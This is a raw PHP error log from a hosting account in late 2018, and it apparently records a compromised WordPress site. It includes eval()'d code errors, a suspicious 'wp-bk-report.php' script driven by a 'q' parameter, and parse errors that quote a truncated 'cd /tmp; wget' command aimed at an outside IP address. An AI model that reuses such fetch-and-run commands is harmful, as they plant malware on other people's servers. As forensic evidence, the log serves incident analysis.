[22-Nov-2018 13:03:45 America/New_York] PHP Fatal error:  Cannot redeclare find_wp_dir() (previously declared in /home/askgtcur/mushincode.win/hjghjerg23443246:20) in /home/askgtcur/mushincode.win/tempotempl(1) : eval()'d code on line 44
[24-Nov-2018 04:41:23 America/New_York] PHP Parse error:  syntax error, unexpected ''cd /tmp; wget http://185.212.' (T_ENCAPSED_AND_WHITESPACE) in /home/askgtcur/mushincode.win/tempotempl on line 1
[24-Nov-2018 06:14:05 America/New_York] PHP Parse error:  syntax error, unexpected ''cd /tmp; wget http://185.212.' (T_ENCAPSED_AND_WHITESPACE) in /home/askgtcur/mushincode.win/tempotempl on line 1
[24-Nov-2018 06:41:01 America/New_York] PHP Parse error:  syntax error, unexpected ''cd /tmp; wget http://185.212.' (T_ENCAPSED_AND_WHITESPACE) in /home/askgtcur/mushincode.win/tempotempl on line 1
[24-Nov-2018 08:06:39 America/New_York] PHP Parse error:  syntax error, unexpected ''cd /tmp; wget http://185.212.' (T_ENCAPSED_AND_WHITESPACE) in /home/askgtcur/mushincode.win/tempotempl on line 1
[24-Nov-2018 08:37:34 America/New_York] PHP Parse error:  syntax error, unexpected ''cd /tmp; wget http://185.212.' (T_ENCAPSED_AND_WHITESPACE) in /home/askgtcur/mushincode.win/tempotempl on line 1
[30-Nov-2018 05:19:21 America/New_York] PHP Notice:  Undefined index: q in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[30-Nov-2018 05:19:57 America/New_York] PHP Notice:  Undefined index: q in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[30-Nov-2018 05:20:24 America/New_York] PHP Notice:  Undefined index: q in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[30-Nov-2018 05:20:53 America/New_York] PHP Notice:  Undefined index: q in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[30-Nov-2018 05:21:11 America/New_York] PHP Notice:  Undefined index: q in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[30-Nov-2018 05:21:28 America/New_York] PHP Notice:  Undefined index: q in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[30-Nov-2018 05:21:49 America/New_York] PHP Notice:  Undefined index: q in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[30-Nov-2018 05:21:58 America/New_York] PHP Warning:  unlink(tempotempl): No such file or directory in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[01-Dec-2018 13:06:33 America/New_York] PHP Notice:  Undefined index: q in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[01-Dec-2018 13:06:49 America/New_York] PHP Notice:  Undefined index: q in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[01-Dec-2018 13:07:05 America/New_York] PHP Notice:  Undefined index: q in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[01-Dec-2018 13:07:20 America/New_York] PHP Notice:  Undefined index: q in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[01-Dec-2018 13:07:35 America/New_York] PHP Notice:  Undefined index: q in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[01-Dec-2018 13:07:51 America/New_York] PHP Notice:  Undefined index: q in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[01-Dec-2018 13:08:07 America/New_York] PHP Notice:  Undefined index: q in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[01-Dec-2018 13:08:14 America/New_York] PHP Warning:  unlink(tempotempl): No such file or directory in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[09-Dec-2018 06:58:15 America/New_York] PHP Notice:  Undefined index: q in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[09-Dec-2018 07:00:36 America/New_York] PHP Notice:  Undefined index: q in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[09-Dec-2018 07:06:37 America/New_York] PHP Notice:  Undefined index: q in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[09-Dec-2018 07:12:37 America/New_York] PHP Notice:  Undefined index: q in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[09-Dec-2018 09:10:56 America/New_York] PHP Notice:  Undefined index: q in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[09-Dec-2018 09:20:58 America/New_York] PHP Notice:  Undefined index: q in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[09-Dec-2018 09:21:17 America/New_York] PHP Notice:  Undefined index: q in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[09-Dec-2018 09:21:36 America/New_York] PHP Notice:  Undefined index: q in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[09-Dec-2018 09:21:54 America/New_York] PHP Notice:  Undefined index: q in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[09-Dec-2018 09:22:13 America/New_York] PHP Notice:  Undefined index: q in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[09-Dec-2018 09:24:15 America/New_York] PHP Notice:  Undefined index: q in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[09-Dec-2018 09:24:40 America/New_York] PHP Notice:  Undefined index: q in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[09-Dec-2018 09:24:52 America/New_York] PHP Warning:  unlink(tempotempl): No such file or directory in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[10-Dec-2018 09:41:15 America/New_York] PHP Notice:  Undefined index: q in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[10-Dec-2018 09:41:35 America/New_York] PHP Notice:  Undefined index: q in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[10-Dec-2018 09:41:55 America/New_York] PHP Notice:  Undefined index: q in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[10-Dec-2018 09:42:16 America/New_York] PHP Notice:  Undefined index: q in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[10-Dec-2018 09:42:34 America/New_York] PHP Notice:  Undefined index: q in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[10-Dec-2018 09:42:53 America/New_York] PHP Notice:  Undefined index: q in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[10-Dec-2018 09:43:12 America/New_York] PHP Notice:  Undefined index: q in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
[10-Dec-2018 09:43:20 America/New_York] PHP Warning:  unlink(tempotempl): No such file or directory in /home/askgtcur/mushincode.win/wp-bk-report.php on line 1
